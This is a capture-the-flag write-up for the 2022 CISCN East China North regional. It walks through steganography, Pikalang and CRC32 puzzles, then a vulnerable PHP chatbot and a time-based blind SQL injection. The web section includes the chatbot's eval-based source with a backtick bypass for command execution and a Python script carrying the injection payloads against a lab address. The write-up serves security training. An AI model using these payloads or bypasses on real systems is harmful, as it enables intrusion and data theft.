2022 CISCN East China North division: challenge reproduction
2022-08-05 18:21:00 【XINO,】
pikachu
Opening the image in Stegsolve reveals LSB steganography: the red, green and blue channels carry an encoded string. zsteg should also find it in one pass.
It looks like Base64, so decode it:
pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu
Decode the pi/ka/chu text (Pikalang):
https://www.dcode.fr/pikalang-language
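Pikalang is Brainfuck with its eight commands re-spelled as Pokémon syllables, so the decoding can also be done offline. The following is an added example, not code from the original post: a small interpreter with a step limit, run on a constructed sample rather than the challenge text.

```python
# Added example: Pikalang is a token-for-token renaming of Brainfuck.
PIKA_TO_BF = {"pi": "+", "ka": "-", "pipi": ">", "pichu": "<",
              "pika": "[", "chu": "]", "pikachu": ".", "pikapi": ","}

def pikalang_to_bf(source):
    """Translate whitespace-separated Pikalang tokens into Brainfuck."""
    unknown = [t for t in source.split() if t not in PIKA_TO_BF]
    if unknown:
        raise ValueError(f"not Pikalang tokens: {unknown[:3]}")
    return "".join(PIKA_TO_BF[t] for t in source.split())

def run_bf(code, stdin=b"", max_steps=1_000_000):
    """Run Brainfuck on a 30000-cell, 8-bit wrapping tape; return the output."""
    jump, stack = {}, []                      # matching-bracket table
    for pos, op in enumerate(code):
        if op == "[":
            stack.append(pos)
        elif op == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            jump[pos] = stack.pop()
            jump[jump[pos]] = pos
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, steps = bytearray(30000), 0, 0, 0
    out, inp = bytearray(), iter(stdin)
    while pc < len(code):
        steps += 1
        if steps > max_steps:                 # untrusted input may loop forever
            raise RuntimeError("step limit reached")
        op = code[pc]
        if op in ("+", "-"):
            tape[ptr] = (tape[ptr] + (1 if op == "+" else -1)) % 256
        elif op in ("<", ">"):
            ptr += 1 if op == ">" else -1
            if not 0 <= ptr < len(tape):
                raise IndexError("tape pointer out of range")
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = next(inp, 0)          # EOF reads as 0
        elif (op == "[" and tape[ptr] == 0) or (op == "]" and tape[ptr] != 0):
            pc = jump[pc]                     # skip the loop or repeat it
        pc += 1
    return out.decode("latin-1")

# Constructed sample: a short Brainfuck program re-spelled as Pikalang.
BF_TO_PIKA = {v: k for k, v in PIKA_TO_BF.items()}
SAMPLE = " ".join(BF_TO_PIKA[c] for c in
                  "++++++++++[>++++++++++<-]>++.++++++.-----------.++++++.")
```

Passing the decoded Base64 text from the image to `run_bf(pikalang_to_bf(...))` gives the same result as the online decoder.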
snowberg
010 Editor reports a CRC error. There is also an encrypted string that looks like AES:
U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==
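But it cannot be decrypted without the key.
zsteg then finds LSB steganography hiding an archive; save it out as a binary file.
The archive holds 4 files and needs a password.
Anyone who has done similar challenges will recognize this as a CRC32 brute force.
Script: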
https://github.com/theonlypwner/crc32
Brute-forcing the files one by one yields the key:
y0u_f0und_th1s_k3y
Then just decrypt the string.
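The CRC32 step works because a ZIP entry's CRC-32 is computed over the plaintext and stored unencrypted in the archive headers, so a file of only a few bytes can be enumerated without the password. An added example (not the linked script and not from the original post), assuming 3-byte fragments over a lowercase/digit/underscore alphabet and a constructed archive:

```python
import io
import itertools
import string
import zipfile
import zlib

ALPHABET = (string.ascii_lowercase + string.digits + "_").encode()

def build_demo_zip(parts):
    """Constructed stand-in archive: one tiny file per fragment.
    The stdlib cannot write encrypted ZIPs; the CRC-32 header field is the
    same either way because it is computed over the plaintext."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for i, part in enumerate(parts, 1):
            zf.writestr(f"{i}.txt", part)
    return buf.getvalue()

def small_entries(zip_bytes, max_len=4):
    """Read (name, size, crc) from the central directory; no password needed."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(e.filename, e.file_size, e.CRC)
                for e in zf.infolist() if e.file_size <= max_len]

def candidates(size, crc, alphabet=ALPHABET):
    """Every `size`-byte string over `alphabet` whose CRC-32 equals `crc`."""
    return [bytes(c) for c in itertools.product(alphabet, repeat=size)
            if zlib.crc32(bytes(c)) == crc]

def recover(zip_bytes):
    """Map each short entry to the plaintexts consistent with its CRC-32."""
    return {name: candidates(size, crc)
            for name, size, crc in small_entries(zip_bytes)}

# Constructed fragments, not the challenge's files.
DEMO_PARTS = [b"k3y", b"_f0", b"r_d", b"3m0"]

if __name__ == "__main__":
    for name, hits in recover(build_demo_zip(DEMO_PARTS)).items():
        print(name, hits)
```

For contents of up to 4 bytes the CRC-32 identifies the plaintext uniquely; longer contents can produce several candidates, which is why `candidates` returns a list.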
old
Base encoding, then ROT13, then a W-type (zigzag) rail fence cipher with 3 rails.
It falls out in one pass.
welcomeToCiscn
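Press F12 and read the page source to find the flag; it is in the /flag directory.
The CTF chatbot
The image action reads arbitrary files. Use it to read the source of api.php: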
```php
<?php
init();

// Start the session (files under /tmp/session) and create the upload dir.
function init(){
    $sesspath = "/tmp/session";
    session_save_path($sesspath);
    session_start();
    if (!$_SESSION['cname'])
        $_SESSION['cname'] = 'ck';
    if(!file_dir_exists("/tmp/resource"))
        mkdir("/tmp/resource");
}

function file_dir_exists($path){
    $dir = dir($path);
    if ($dir)
        if ($dir->read())
            return true;
    return is_file($path);
}

// Answer a chat message from the uploaded JSON dictionary.
function getres($input){
    log_write($input);
    chdir("/tmp/resource/");
    $path = $_SESSION['cname'];
    if(!file_dir_exists($path)){
        return "请先上传词库文件。"; // "Please upload a dictionary file first."
    }
    $ck = json_decode(file_get_contents($path),true);
    foreach ($ck as $key => $value){
        if (strstr($key,$input) or strstr($input,$key)){
            $type = key($value);
            $v = $value[$type];
            switch ($type){
                case "string":
                    return $v;
                case "image":
                    $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>';
                    return $b64img;
                case "calc":
                    if ($_SESSION['is_admin']){
                        if (preg_match("/\(|\)|\'|\"/im",$v)){
                            return "包含非法字符"; // "Contains illegal characters"
                        }
                        return eval("return $v;");
                    }else{
                        return "admin才能使用这个功能"; // "Only admin can use this feature"
                    }
                default:
                    return "这个动作暂时还没能实现"; // "This action is not implemented yet"
            }
        }
    }
    return "没有匹配到词库消息"; // "No matching dictionary entry"
}

// Store the uploaded dictionary under /tmp/resource/<cname>.
function uploadc(){
    $data = $_POST['uploadc'];
    $filename = $_POST['cname'];
    $resourcedir = "/tmp/resource/";
    if(!file_dir_exists($resourcedir))
        mkdir($resourcedir);
    if(strpos($data,"<")){
        die("别这样!"); // "Don't do that!"
    }
    if(strpos($filename,".")){
        die("别这样!");
    }
    $_SESSION['cname'] = $filename;
    if(file_put_contents($resourcedir.$filename,$data)) {
        return "上传成功"; // "Upload succeeded"
    }else{
        return "上传失败"; // "Upload failed"
    }
}

function log_write($msg){
    $logpath = "log.txt";
    $oper = session_id();
    $opername = substr($oper,0,1) ;
    for ($i=0;$i <= strlen($oper);$i++)
        $opername .= "*";
    file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);
}

if(isset($_POST['input']))
    echo getres($_POST['input']);
if(isset($_POST['uploadc']))
    echo uploadc();
if(isset($_POST['clear']))
    file_put_contents("log.txt","");
if(isset($_GET['log']))
    echo file_get_contents("log.txt");
```
Use the upload function to write a session file and obtain admin privileges.
The code-execution path filters parentheses and quotes, which backticks bypass directly.
Then just execute a command.
ezsql
Blind injection (the script below is time-based), with no filtering at all. Note that the column being read is in a different database from the one the site is currently using, and the column name has to be wrapped in backticks, otherwise the query does not work.
```python
import requests

url='http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag=''
for i in range(1,55):
    # Binary search over printable ASCII for the i-th character.
    m=32
    n=127
    while 1:
        mid=(m+n)//2
        #payload="1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i,mid)#ctfshow_flagxc,ctfshow_info
        #mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s
        #payload="1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i,mid)
        #account_status,account_type,accounts,customers,customers_sNpe,users
        #payload="1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i,mid)
        # [email protected]
        payload="1'or if(ascii(substr((select `[email protected]` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i,mid)
        print(url+payload)
        try:
            r=requests.get(url=url+payload,timeout=2)
            m=mid  # answered within the timeout: character >= mid
        except requests.exceptions.Timeout:
            n=mid  # timed out: the sleep() branch ran, character < mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break
```